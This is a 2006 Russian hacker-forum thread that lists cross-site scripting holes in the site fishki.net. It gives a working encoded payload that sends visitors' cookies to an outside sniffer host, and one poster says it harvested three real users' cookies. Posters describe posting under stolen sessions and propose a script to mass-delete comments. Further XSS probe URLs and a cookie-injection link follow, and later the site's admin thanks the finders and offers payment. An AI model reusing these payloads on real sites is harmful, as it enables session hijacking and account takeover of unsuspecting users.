Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
25.03.2006, 17:17
|
|
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162
Репутация:
1320
|
|
xss на www.fishki.net
Пассивная XSS в поиске на популярном сайте _www.fishki.net:
если человек пройдет по ссылке _http://fishki.net/poisk.php?poisk=%27%3E%3Cscript%3Eimg+%3D+new+Imag e%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru %2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript %3E
То оставит свои куки на сниффере. После подмены, можно писать комментарии под его ником. Больше никаких функций не будет по-моему. Поэтому ксс относительно бесполезная. Тема на форуме: "Глюк на фишки нет" с этой ссылкой пролежала 5 минут и принесла 3 куков.
|
|
|
26.03.2006, 03:24
|
|
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162
Репутация:
1320
|
|
Обнаружил, что можно удалять комментарии, если вставить в куки че-нить дельное. Например ed36464a5c3b8f90fcd5d950a66197f4. Можно например написать скрипт, который будет лазить по топискам и тереть все комментарии, кроме нужных (реклама например)...
Если кто-нить будет реализовывать, накиньте денег на пивко...  |
|
|
|
26.03.2006, 12:33
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
podkashey, молодец)
Дельно нашёл..) на пивко не смогу накинуть, а вот репку)..
|
|
|
|
29.03.2006, 14:07
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131
Репутация:
774
|
|
Вот еще: http://www.fishki.net/gresult.php?pollid='><script>alert('XSS')%3B</script>&voteid=1 ; http://www.fishki.net/comment.php?id='><script>alert('XSS')%3B</script> ; http://www.fishki.net/rgolos.php?pollid='><script>alert('XSS')%3B</script> ; http://www.fishki.net/gresult.php?pollid='><script>alert('XSS');</script> и еще установка своих cookies - http://www.fishki.net/votecomsend.ph...der%3Dinjected
__________________
Завтра будет.Лучше.
|
|
|
|
29.03.2006, 17:02
|
|
Новичок
Регистрация: 27.03.2006
Сообщений: 4
Провел на форуме:
37525
Репутация:
0
|
|
хотел бы выразить благодарность за создание этой темы и отдельно ресурсу античат.
podkashey, как мы с тобой уже договорились - на пиво я тебе дам за проделанную работу, кинь мне в пм wmz, на этой неделе постараюсь перевести.
Go0o$E, тебе тоже большое спасибо за найденные уязвимости, кинь также в пм свой wmz, постараюсь не обидеть.
как получите wmz, отпишитесь в этой теме, пожалуйста, чтоб не думали, что я обманул.
Спасибо.
|
|
|
|
29.03.2006, 18:25
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
2HitMan
Ты админыч фишки?
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
29.03.2006, 18:28
|
|
Новичок
Регистрация: 27.03.2006
Сообщений: 4
Провел на форуме:
37525
Репутация:
0
|
|
censored!, да.
не с самого начала, двиг начат не мной, там внизу подписано чей
From m0nzt3r: сорри не удержался, просто твой проект нравится мне.Так держать!
Последний раз редактировалось m0nzt3r; 09.05.2006 в 22:32..
Причина: )
|
|
|
|
09.05.2006, 21:11
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
http://xshop.fishki.net/my/orders/get_by_code.php?code=<script>alert(/xss_by_toxa/);alert(document.cookie)</script>&check=
__________________
|
|
|
|
09.05.2006, 21:21
|
|
Новичок
Регистрация: 27.03.2006
Сообщений: 4
Провел на форуме:
37525
Репутация:
0
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
